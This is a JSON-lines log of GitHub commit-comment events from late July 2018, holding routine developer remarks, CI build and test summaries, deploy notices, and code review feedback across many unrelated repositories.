{"id":"8031262292","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29865117,"position":null,"line":null,"path":null,"commit_id":"1bd6293349cc9895dce86c7889ea5c6929ca9c9c","created_at":"2018-07-27T23:44:09Z","updated_at":"2018-07-27T23:44:09Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/1bd6293349cc9895dce86c7889ea5c6929ca9c9c/index.html"}},"created_at":"2018-07-27T23:44:09Z"}
{"id":"8031263289","type":"CommitCommentEvent","actor":{"login":"cocoitali"},"repo":{"name":"cocoitali/Lambda-Hello"},"payload":{"comment":{"id":29865124,"position":null,"line":null,"path":null,"commit_id":"aabc6ddead6e565370bf4f254b62b13309582a63","created_at":"2018-07-27T23:44:38Z","updated_at":"2018-07-27T23:44:38Z","author_association":"OWNER","body":"@gakko1 changed the file to describe shallow me(.... haha harsh!) for the \"Branch Challenge\".\r\nMade changes to descriptors and favorite hobby."}},"created_at":"2018-07-27T23:44:38Z"}
{"id":"8031263306","type":"CommitCommentEvent","actor":{"login":"curaor"},"repo":{"name":"curaor/ikonnect2018"},"payload":{"comment":{"id":29865125,"position":null,"line":null,"path":null,"commit_id":"92d673d9700afd599a766c8aaac44df135aee96e","created_at":"2018-07-27T23:44:38Z","updated_at":"2018-07-27T23:44:38Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/1fc451be-a385-4829-ab92-933835dd5421?env_id=ibm%3Ayp%3Aus-south \"iKonnect Demo\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/a3ce1f82-5041-4b59-8085-56606b5270ea?env_id=ibm%3Ayp%3Aus-south \"iKonnect Pipeline Demo\") deployed [ikonnect2018](https://github.com/curaor/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-omar.cura-omar.cura-20180727-234437 \"deploy-ibm-yp-us-south-omar.cura-omar.cura-20180727-234437\") to [omar.cura](https://console.bluemix.net/apps/637f7cf6-72e3-4e5d-a2d7-9eed54656346?env_id=ibm:yp:us-south \"ibm:yp:us-south:omar.cura:omar.cura\"), including this commit"}},"created_at":"2018-07-27T23:44:38Z"}
{"id":"8031264534","type":"CommitCommentEvent","actor":{"login":"DeadJim606"},"repo":{"name":"DeadJim606/Mutilate"},"payload":{"comment":{"id":29865129,"position":null,"line":null,"path":null,"commit_id":"8fda186251ebf35e82e0724c54b18d0fa7bb399a","created_at":"2018-07-27T23:45:15Z","updated_at":"2018-07-27T23:45:15Z","author_association":"OWNER","body":"Combat:\r\n- ecost multiplier removed\r\n- Rotation logic updated, especially RTB\r\n- Tracking Loaded Dice aura\r\n- Tracking and displaying Blade Flurry\r\n\r\nAll:\r\n- Tricks dropped for Feint\r\n\r\nMut/Sub:\r\n- Tracking Evasion for Mut/Sub on rotation frame\r\n"}},"created_at":"2018-07-27T23:45:15Z"}
{"id":"8031268503","type":"CommitCommentEvent","actor":{"login":"curaor"},"repo":{"name":"curaor/ikonnect2018"},"payload":{"comment":{"id":29865137,"position":null,"line":null,"path":null,"commit_id":"f061fde60679cc9d7ff0fc55ae7a62dac1c0d2a4","created_at":"2018-07-27T23:47:12Z","updated_at":"2018-07-27T23:47:12Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/1fc451be-a385-4829-ab92-933835dd5421?env_id=ibm%3Ayp%3Aus-south \"iKonnect Demo\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/a3ce1f82-5041-4b59-8085-56606b5270ea?env_id=ibm%3Ayp%3Aus-south \"iKonnect Pipeline Demo\") deployed [ikonnect2018](https://github.com/curaor/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-omar.cura-omar.cura-20180727-234711 \"deploy-ibm-yp-us-south-omar.cura-omar.cura-20180727-234711\") to [omar.cura](https://console.bluemix.net/apps/637f7cf6-72e3-4e5d-a2d7-9eed54656346?env_id=ibm:yp:us-south \"ibm:yp:us-south:omar.cura:omar.cura\"), including this commit"}},"created_at":"2018-07-27T23:47:12Z"}
{"id":"8031269571","type":"CommitCommentEvent","actor":{"login":"ribrdb"},"repo":{"name":"ribrdb/Algebrite"},"payload":{"comment":{"id":29865140,"position":null,"line":null,"path":null,"commit_id":"fcbec7cc775a1df57c052d98fa405d93f3905eba","created_at":"2018-07-27T23:47:45Z","updated_at":"2018-07-27T23:47:45Z","author_association":"OWNER","body":"Yes, this was the cause of https://github.com/davidedc/Algebrite/issues/62"}},"created_at":"2018-07-27T23:47:45Z"}
{"id":"8031269631","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"google/tie"},"payload":{"comment":{"id":29865141,"position":17,"line":48,"path":"client/question/services/ParentPageService.js","commit_id":"d530df08711ee59ebf95841114b64f451da46ade","created_at":"2018-07-27T23:47:47Z","updated_at":"2018-07-27T23:47:47Z","author_association":"MEMBER","body":"Function names should start with verbs."}},"created_at":"2018-07-27T23:47:47Z"}
{"id":"8031269988","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29865142,"position":5,"line":30,"path":"pkgs/development/coq-modules/category-theory/default.nix","commit_id":"08bf0b7630afa8656bb36bd61fac8ce9b2aff613","created_at":"2018-07-27T23:47:59Z","updated_at":"2018-07-27T23:47:59Z","author_association":"CONTRIBUTOR","body":"Thanks Matt, I fix it very soon after."}},"created_at":"2018-07-27T23:47:59Z"}
{"id":"8031270404","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"MatthewKush/xray-oxygen"},"payload":{"comment":{"id":29865145,"position":null,"line":null,"path":null,"commit_id":"72be8940243157ab76f0645a54c23351ca643780","created_at":"2018-07-27T23:48:12Z","updated_at":"2018-07-27T23:48:12Z","author_association":"NONE","body":"Fix your name on readme and send PR. \r\n\r\nP.S. And one more thing, I don't care about reputation."}},"created_at":"2018-07-27T23:48:12Z"}
{"id":"8031270584","type":"CommitCommentEvent","actor":{"login":"JiaminZhu"},"repo":{"name":"vipragupta/dce-go"},"payload":{"comment":{"id":29865147,"position":61,"line":793,"path":"utils/pod/pod.go","commit_id":"0aca73926407cd6c7304a2a20fe68d7e4b086fa0","created_at":"2018-07-27T23:48:19Z","updated_at":"2018-07-27T23:48:19Z","author_association":"NONE","body":"Only run log cmd when sending terminate status like FAILED, KILLED, FINISHED. "}},"created_at":"2018-07-27T23:48:19Z"}
{"id":"8031270805","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"google/tie"},"payload":{"comment":{"id":29865148,"position":5,"line":36,"path":"client/question/services/ParentPageService.js","commit_id":"d530df08711ee59ebf95841114b64f451da46ade","created_at":"2018-07-27T23:48:25Z","updated_at":"2018-07-27T23:48:25Z","author_association":"MEMBER","body":"Actually ... could we change the name to EXPECTED_PARENT_PAGE_URL_ORIGIN or EXPECTED_PARENT_PAGE_ORIGIN? That would make it clearer that it's what's expected, and not the actual current one."}},"created_at":"2018-07-27T23:48:25Z"}
{"id":"8031271383","type":"CommitCommentEvent","actor":{"login":"aymanbagabas"},"repo":{"name":"aymanbagabas/aymanbagabas.github.io"},"payload":{"comment":{"id":29865151,"position":9,"line":9,"path":"_posts/2018/2018-07-23-archlinux-on-matebook-x-pro.md","commit_id":"e0034bc85b8d9f5a0f20f59fb19ceeaf14aa35f8","created_at":"2018-07-27T23:48:43Z","updated_at":"2018-07-27T23:48:43Z","author_association":"OWNER","body":"@Redorb I tried that but I couldn't get it to work, the sound stops working every time I try to apply the settings. I can't set pin 0x14 connectivity to be empty I have to choose an option, I tried it with \"not connected\" option and that's when the sound stops working. Could you share your generated script file after you click apply?"}},"created_at":"2018-07-27T23:48:43Z"}
{"id":"8031272819","type":"CommitCommentEvent","actor":{"login":"jacobrgardner"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29865152,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-27T23:49:28Z","updated_at":"2018-07-27T23:49:28Z","author_association":"MEMBER","body":"ce32d22 / #207 should solve the issue. Once those are merged in, it'd be best to rebase this branch since both your txt file if you actually try to get the predictive variances and the notebook require Geoff's `_get_indices` implementation to work properly too."}},"created_at":"2018-07-27T23:49:28Z"}
{"id":"8031273345","type":"CommitCommentEvent","actor":{"login":"bossanova808"},"repo":{"name":"FosterCommerce/CommerceRegisterOnCheckout"},"payload":{"comment":{"id":29865153,"position":null,"line":null,"path":null,"commit_id":"3e3470f23e006ce3f35a3bc9408ef4f19028a9c6","created_at":"2018-07-27T23:49:43Z","updated_at":"2018-07-27T23:49:43Z","author_association":"NONE","body":"@johnnynotsolucky All the Readme stuff looks fine, thanks (and for trimming some of my over explaining!).\r\n\r\nRe: the Image Science code, I will actually probably have to put that back in but will do so if/when I need it.  As I recall there's some problem with running that code at the event point to do with db transaction stuff that forced me to put it there (gross though it is) - basically to do with the order of saving the order/user etc.\r\n\r\nAnyway, was definitely on the list to look  at again when moving to Craft3 so I'll only put it back if absolutely necessary basically...but it was a classic non-deterministic order thing to do with multiple plugins listening to the same event and not being able to guarantee the order of execution.  There's a bunch of SE messages about why this is a problem, but I've not seen a solution...but again, it may well have changed a lot with all the changes to Craft3 and Commerce2 anyway, so fingers crossed I can leave it out.\r\n\r\n@sjcallender Sounds good.  I committed to ajax way early but yep also planned to make it non ajax friendly, so thanks again!"}},"created_at":"2018-07-27T23:49:43Z"}
{"id":"8031277126","type":"CommitCommentEvent","actor":{"login":"bernardthered"},"repo":{"name":"smanross/personal"},"payload":{"comment":{"id":29865163,"position":1,"line":1,"path":"cloudbolt/rest/curl_example.sh","commit_id":"563fc7f83a75544e469eab5d4f6a67636179bdcf","created_at":"2018-07-27T23:51:35Z","updated_at":"2018-07-27T23:51:35Z","author_association":"NONE","body":"Great example script!\r\n\r\nIt could be good to mention what this script does in either the filename or the first comment line - does it list CB groups? decom a server? order a BP?"}},"created_at":"2018-07-27T23:51:35Z"}
{"id":"8031282083","type":"CommitCommentEvent","actor":{"login":"christinaa"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29865171,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-27T23:54:08Z","updated_at":"2018-07-27T23:54:08Z","author_association":"NONE","body":"@satmandu No I do not believe devkits shout **ever** come with fused signing keys. I would never recommend a devkit that locks users out of TrustZone or similar areas intentionally (even NVIDIA Tegra devkits respect that).  That's a very strong opinion I have always held regarding dev boards that are designed for tinkering with, even if they don't supply documentation, my issue is in locking the platform down at/just after manufacturing with vendor keys. RPi does not lock you out so in that area, it's fine by me (it doesn't yet, they can do that in any firmware update and then your Pi will only run BCM signed firmware so you won't get to do anything with the VPU).\r\n\r\n> Hopefully the RPi foundation can be nudged towards fixing some of those platform issues with their next iteration, as the device is being used widely, and not just for hobby use.\r\n\r\nI mean it's nice to hope for things but in my experience with the foundation and the users (strictly personal opinion) is that the foundation cares about their PR far far more than users, people give them too much credit. Redesigning that chip is likely not financially viable for RPi and BCM won't pay for it because for BCM RPi sales are like a drop in the ocean, even if you ignore the fact that the hardware is a horrible hack (ARMv6 was well integrated, ARMv7+ was integrated with a chainsaw (again, disclaimer, I don't literally mean that)).\r\n\r\n@andreiw I'd argue that sunxi chips which are cheap as hell and have documented TZPCs and OTP regions for secure boot in a nice wiki are probably best for that kind of things assuming yours isn't programmed and most aren't (like in Pine64 boards). So if you want to mess with a real and working TZ implementation, that's a good pick.\r\n\r\nFor commercial solutions, of course, contact whichever vendor is offering what you like (Which wouldn't be Broadcom if you wanted ARMv8) and given that you have enough volume in how many chips you want, sign an agreement, read the integrator's docs and integrate their IP into your product.\r\n\r\n-----\r\n\r\n**tl;dr: Get a sunxi devkit.** The foundation does not care what you or anyone thinks unless you want to pour money into it, enough for BCM to design a new and custom chip with modern ARM architectures in mind. Speaking purely from personal experience and personal opinions, I do not hold the foundation in high regard after a certain a very high level BCM and/or foundation employee (at least I believe so) showed very little regard or care (as I perceived it) over others' IP or copyright or potential GPLv2 violations. I do not believe I had any interaction with anyone on the foundation since then.\r\n\r\n*(Disclaimer: Everything said here is a personal opinion and is a recollection of events that have happened in the past that may not be 100% accurate. It does not represent my employer or any of their opinions about BCM. I have left the name of the person in question out and to my best knowledge this is the situation,  I am not claiming that any of the things I said are a fact.)*"}},"created_at":"2018-07-27T23:54:08Z"}
{"id":"8031282412","type":"CommitCommentEvent","actor":{"login":"davetimmins"},"repo":{"name":"davetimmins/Anywhere.ArcGIS"},"payload":{"comment":{"id":29865172,"position":null,"line":null,"path":null,"commit_id":"ce8ba663dbfcdec737e24062769c502310f19546","created_at":"2018-07-27T23:54:18Z","updated_at":"2018-07-27T23:54:18Z","author_association":"OWNER","body":"Yea I don't do any checking of the service capabilities or cross referencing with the version of ArcGIS Server to see what would be available so it's down to the author of the app being written to verify all of that."}},"created_at":"2018-07-27T23:54:18Z"}
{"id":"8031286494","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865177,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-27T23:56:30Z","updated_at":"2018-07-27T23:56:30Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1696 of 1698 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.88%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-27T23:56:30Z"}
{"id":"8031286557","type":"CommitCommentEvent","actor":{"login":"Larrymuers"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":29865179,"position":7,"line":70,"path":"config/app.php","commit_id":"cf6c0ad87ad40622a685f32b4616e2e594a1857f","created_at":"2018-07-27T23:56:32Z","updated_at":"2018-07-27T23:56:32Z","author_association":"NONE","body":"923943"}},"created_at":"2018-07-27T23:56:32Z"}
{"id":"8031291857","type":"CommitCommentEvent","actor":{"login":"shivammaggu"},"repo":{"name":"shivammaggu/SMTP-mail-sender"},"payload":{"comment":{"id":29865184,"position":null,"line":null,"path":null,"commit_id":"2cd0fb00a405049b5173f728c9b4e231acdce1f8","created_at":"2018-07-27T23:59:23Z","updated_at":"2018-07-27T23:59:23Z","author_association":"OWNER","body":"SMTP with TLS"}},"created_at":"2018-07-27T23:59:23Z"}
{"id":"8026282732","type":"CommitCommentEvent","actor":{"login":"mnmix"},"repo":{"name":"gygrazok/witchmod"},"payload":{"comment":{"id":29853101,"position":null,"line":null,"path":null,"commit_id":"160664495c52a75a7b28796d612cda4f14ffd0f3","created_at":"2018-07-27T03:00:28Z","updated_at":"2018-07-27T03:00:28Z","author_association":"NONE","body":"Nice update, I've really been enjoying this mod so far, and the way that the witch works is really interesting. I couldn't find anywhere else to comment on this repository since I'm fairly new to github, but I saw the comment about submitting new art for the mod, and I whipped this up based on the demon fyre card a bit ago and wanted to know what you think! have a good day!\r\n\r\n![1532658592355](https://user-images.githubusercontent.com/41762853/43299305-e5581732-9116-11e8-968b-98f6b89d0eca.png)\r\n"}},"created_at":"2018-07-27T03:00:28Z"}
{"id":"8026285115","type":"CommitCommentEvent","actor":{"login":"abz53378"},"repo":{"name":"Canner/canner"},"payload":{"comment":{"id":29853114,"position":4,"line":47,"path":"src/hocs/validation.js","commit_id":"ddcad10568fd410573e9550ed5d5dfe050c6fed5","created_at":"2018-07-27T03:01:23Z","updated_at":"2018-07-27T03:01:23Z","author_association":"COLLABORATOR","body":"@chilijung, the original message is too different from the default Ajv messages which are all lower case like `should be >= 18`, but you are right that the new message is not a better message, so I will change it to `should be required`, how do you think?"}},"created_at":"2018-07-27T03:01:23Z"}
{"id":"8026286743","type":"CommitCommentEvent","actor":{"login":"YolandaZhong29"},"repo":{"name":"YolandaZhong29/yolanda.github.io"},"payload":{"comment":{"id":29853132,"position":null,"line":null,"path":null,"commit_id":"b0ac288d63941ad5af84b1933965084bb77bd435","created_at":"2018-07-27T03:01:59Z","updated_at":"2018-07-27T03:01:59Z","author_association":"OWNER","body":"Add content to new pages site"}},"created_at":"2018-07-27T03:01:59Z"}
{"id":"8026290619","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29853152,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-27T03:03:29Z","updated_at":"2018-07-27T03:03:29Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - Win64-Windows-7-VisualStudio-14: Tests Failed (2358 of 2924 tests passed, 57 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 498 tests had: ESO small diffs.\n * 562 tests had: Table big diffs.\n * 360 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 88 tests had: ESO big diffs.\n * 91 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 28 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 12 tests had: SSZ small diffs.\n * 19 tests had: ZSZ small diffs.\n * 3 tests had: Table small diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 57\n * Failed: 566\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.64%25-red.png)</a> \n"}},"created_at":"2018-07-27T03:03:29Z"}
{"id":"8026290722","type":"CommitCommentEvent","actor":{"login":"mchlp"},"repo":{"name":"brandongit2/math"},"payload":{"comment":{"id":29853154,"position":null,"line":null,"path":null,"commit_id":"efdd9fcdf967f93356064c8ddefe66c254813d39","created_at":"2018-07-27T03:03:31Z","updated_at":"2018-07-27T03:03:31Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add `--dev` and `--prod` flags to `gulp build` command](https://trello.com/c/U4sVTRnQ/4-add-dev-and-prod-flags-to-gulp-build-command)"}},"created_at":"2018-07-27T03:03:31Z"}
{"id":"8026301011","type":"CommitCommentEvent","actor":{"login":"hail2u"},"repo":{"name":"hail2u/html-best-practices"},"payload":{"comment":{"id":29853184,"position":null,"line":null,"path":null,"commit_id":"571f06aa8769f1cc51a96b580db6261289515788","created_at":"2018-07-27T03:07:40Z","updated_at":"2018-07-27T03:07:40Z","author_association":"OWNER","body":"Thanks: https://twitter.com/_yuheiy/status/1022674454084694017?s=20"}},"created_at":"2018-07-27T03:07:40Z"}
{"id":"8026307465","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29853197,"position":null,"line":null,"path":null,"commit_id":"3ee33a1127bf268e926d3825faaf1f53ef0406d3","created_at":"2018-07-27T03:10:24Z","updated_at":"2018-07-27T03:10:24Z","author_association":"OWNER","body":"@nguyenhien1994 , @quoctri1 , maybe you want to merge this commit to your branch"}},"created_at":"2018-07-27T03:10:24Z"}
{"id":"8026309497","type":"CommitCommentEvent","actor":{"login":"LoongRay"},"repo":{"name":"LoongRay/test"},"payload":{"comment":{"id":29853199,"position":null,"line":null,"path":null,"commit_id":"b321a2be039d71f49b5ef65e04d1b44023160edd","created_at":"2018-07-27T03:11:11Z","updated_at":"2018-07-27T03:11:11Z","author_association":"OWNER","body":"第一次使用github删除文件"}},"created_at":"2018-07-27T03:11:11Z"}
{"id":"8026312270","type":"CommitCommentEvent","actor":{"login":"chilijung"},"repo":{"name":"Canner/canner"},"payload":{"comment":{"id":29853202,"position":4,"line":47,"path":"src/hocs/validation.js","commit_id":"ddcad10568fd410573e9550ed5d5dfe050c6fed5","created_at":"2018-07-27T03:12:16Z","updated_at":"2018-07-27T03:12:16Z","author_association":"MEMBER","body":"I think `should be required` looks good."}},"created_at":"2018-07-27T03:12:16Z"}
{"id":"8026318450","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29853206,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T03:14:49Z","updated_at":"2018-07-27T03:14:49Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T03:14:49Z"}
{"id":"8026320383","type":"CommitCommentEvent","actor":{"login":"Zoehax"},"repo":{"name":"Zoehax/SIT313"},"payload":{"comment":{"id":29853214,"position":null,"line":null,"path":null,"commit_id":"06971e409d9c69278017717f749bdd1b7447d2de","created_at":"2018-07-27T03:15:37Z","updated_at":"2018-07-27T03:15:37Z","author_association":"OWNER","body":"Hello~ \r\ncuz some technical problem, I will save every single part of my code on GitHub."}},"created_at":"2018-07-27T03:15:37Z"}
{"id":"8026325410","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29853217,"position":16,"line":16,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/Style.java","commit_id":"66cbaced606df789f6271e3af09a9dca0fd9fb56","created_at":"2018-07-27T03:17:41Z","updated_at":"2018-07-27T03:17:41Z","author_association":"OWNER","body":"@songy23 - So the sources I've read thus far say a private class would not be visible by classes outside of its own package, so I made the class public (seen below). I'm also not certain I am using the 'package' in Style.java or its counterpart 'import' in RpcZPageHandler.java correctly. Also, do packages need to be declared? Am I over-complicating this? :-)  \r\n2 warnings & 1 error on build:\r\n```\r\n> Task :opencensus-contrib-zpages:compileJava FAILED\r\n/Users/adamgarza/Desktop/opencensus-java/contrib/zpages/src/main/java/io/opencensus/contrib/zpages/Style.java:17: warning: [PackageLocation] Expected package Styles to be declared in a directory ending with /Styles, instead found /Users/adamgarza/Desktop/opencensus-java/contrib/zpages/src/main/java/io/opencensus/contrib/zpages\r\npackage Styles;\r\n        ^\r\n    (see http://errorprone.info/bugpattern/PackageLocation)\r\n/Users/adamgarza/Desktop/opencensus-java/contrib/zpages/src/main/java/io/opencensus/contrib/zpages/Style.java:19: warning: [PrivateConstructorForUtilityClass] Utility classes (only static members) are not designed to be instantiated and should be made noninstantiable with a default constructor.\r\npublic final class Style {\r\n             ^\r\n    (see http://errorprone.info/bugpattern/PrivateConstructorForUtilityClass)\r\n  Did you mean to remove this line?\r\nerror: warnings found and -Werror specified\r\n1 error\r\n2 warnings\r\n\r\nFAILURE: Build failed with an exception.\r\n``` "}},"created_at":"2018-07-27T03:17:41Z"}
{"id":"8026326413","type":"CommitCommentEvent","actor":{"login":"gleds3000"},"repo":{"name":"gleds3000/prjsimples"},"payload":{"comment":{"id":29853220,"position":null,"line":null,"path":null,"commit_id":"08e2a92caa17a5e5dd2077a22fb98e4a9bb25ef9","created_at":"2018-07-27T03:18:06Z","updated_at":"2018-07-27T03:18:06Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-27T03:18:06Z"}
{"id":"8026332636","type":"CommitCommentEvent","actor":{"login":"Tran-Nam"},"repo":{"name":"Tran-Nam/Learn-ML"},"payload":{"comment":{"id":29853229,"position":null,"line":null,"path":null,"commit_id":"b43d9b17d8865d0a5d57bc3c9f852bdd3ee6d0d3","created_at":"2018-07-27T03:20:27Z","updated_at":"2018-07-27T03:20:27Z","author_association":"OWNER","body":"GD for one variate "}},"created_at":"2018-07-27T03:20:27Z"}
{"id":"8026333365","type":"CommitCommentEvent","actor":{"login":"gustavors01"},"repo":{"name":"gustavors01/RTLSDR-Airband"},"payload":{"comment":{"id":29853230,"position":null,"line":null,"path":null,"commit_id":"514012677b443ea9c9d94f6b98244ee6da8b5166","created_at":"2018-07-27T03:20:44Z","updated_at":"2018-07-27T03:20:44Z","author_association":"OWNER","body":"On config file output need to use split_trans = true, file will have ...HHMMSS.mp3.\r\nDefault is false and nothing changed, file name ...HH.mp3."}},"created_at":"2018-07-27T03:20:44Z"}
{"id":"8026354927","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29853265,"position":null,"line":null,"path":null,"commit_id":"f76c6f42a3c0b9be345859545bd37bf5df9be20d","created_at":"2018-07-27T03:29:34Z","updated_at":"2018-07-27T03:29:34Z","author_association":"NONE","body":"Congratulations too."}},"created_at":"2018-07-27T03:29:34Z"}
{"id":"8026363522","type":"CommitCommentEvent","actor":{"login":"terrytang0702"},"repo":{"name":"terrytang0702/development"},"payload":{"comment":{"id":29853276,"position":null,"line":null,"path":null,"commit_id":"81acd9fcc12d6635e9871ee10c4ac4931bcde2eb","created_at":"2018-07-27T03:32:58Z","updated_at":"2018-07-27T03:32:58Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-27T03:32:58Z"}
{"id":"8026365267","type":"CommitCommentEvent","actor":{"login":"Snow-Pyon"},"repo":{"name":"iBlitzkriegi/Vixio"},"payload":{"comment":{"id":29853278,"position":18,"line":16,"path":"src/main/java/me/iblitzkriegi/vixio/expressions/guild/ExprVoiceChannels.java","commit_id":"9e3c7e21d77aeef6c0fd9fc87bc9350f5dc34490","created_at":"2018-07-27T03:33:32Z","updated_at":"2018-07-27T03:33:32Z","author_association":"CONTRIBUTOR","body":"You should make this accept multiple objects"}},"created_at":"2018-07-27T03:33:32Z"}
{"id":"8026365268","type":"CommitCommentEvent","actor":{"login":"techknohauz"},"repo":{"name":"LambdaSchool/Lambda-Hello"},"payload":{"comment":{"id":29853277,"position":null,"line":null,"path":null,"commit_id":"2bb8fc665afbee50003ad185e401884378685b81","created_at":"2018-07-27T03:33:32Z","updated_at":"2018-07-27T03:33:32Z","author_association":"NONE","body":" Modified the file RobinF.txt - Corrected the spelling of \"research\"\r\n@camilamdaniels"}},"created_at":"2018-07-27T03:33:32Z"}
{"id":"8026371854","type":"CommitCommentEvent","actor":{"login":"jess18"},"repo":{"name":"jess18/stop-github-from-auto-repository-"},"payload":{"comment":{"id":29853288,"position":22,"line":22,"path":".gitignore","commit_id":"0407e29a98f092a87ad0cfe8128f6a9092998783","created_at":"2018-07-27T03:36:13Z","updated_at":"2018-07-27T03:36:13Z","author_association":"OWNER","body":"Remove brake lines or I swear I’m suing y’all "}},"created_at":"2018-07-27T03:36:13Z"}
{"id":"8026372104","type":"CommitCommentEvent","actor":{"login":"jam10636"},"repo":{"name":"jam10636/Wolifer"},"payload":{"comment":{"id":29853289,"position":null,"line":null,"path":null,"commit_id":"10e7ad40d78da5f1c422f9b95cd1f3fdba1bedd9","created_at":"2018-07-27T03:36:19Z","updated_at":"2018-07-27T03:36:19Z","author_association":"OWNER","body":"LoginAction"}},"created_at":"2018-07-27T03:36:19Z"}
{"id":"8026375658","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29853297,"position":null,"line":null,"path":null,"commit_id":"2b92aeea905ed59efaa4e7f11735ba033f42d202","created_at":"2018-07-27T03:37:49Z","updated_at":"2018-07-27T03:37:49Z","author_association":"NONE","body":"http://tests.stockfishchess.org/tests/view/5b59fa850ebc5902bdb8b5f7\r\nNot LTC\r\ntc 10+0.1"}},"created_at":"2018-07-27T03:37:49Z"}
{"id":"8026375833","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29853299,"position":null,"line":null,"path":null,"commit_id":"92fd61bbae08501ad37a19fae6fd4041d6d7f092","created_at":"2018-07-27T03:37:53Z","updated_at":"2018-07-27T03:37:53Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-27T03:37:53Z"}
{"id":"8026376769","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29853301,"position":null,"line":null,"path":null,"commit_id":"92fd61bbae08501ad37a19fae6fd4041d6d7f092","created_at":"2018-07-27T03:38:18Z","updated_at":"2018-07-27T03:38:18Z","author_association":"NONE","body":"I think it will be about time to run a progression test after this one - 8 elo gainers since last one...\r\nCongrats!"}},"created_at":"2018-07-27T03:38:18Z"}
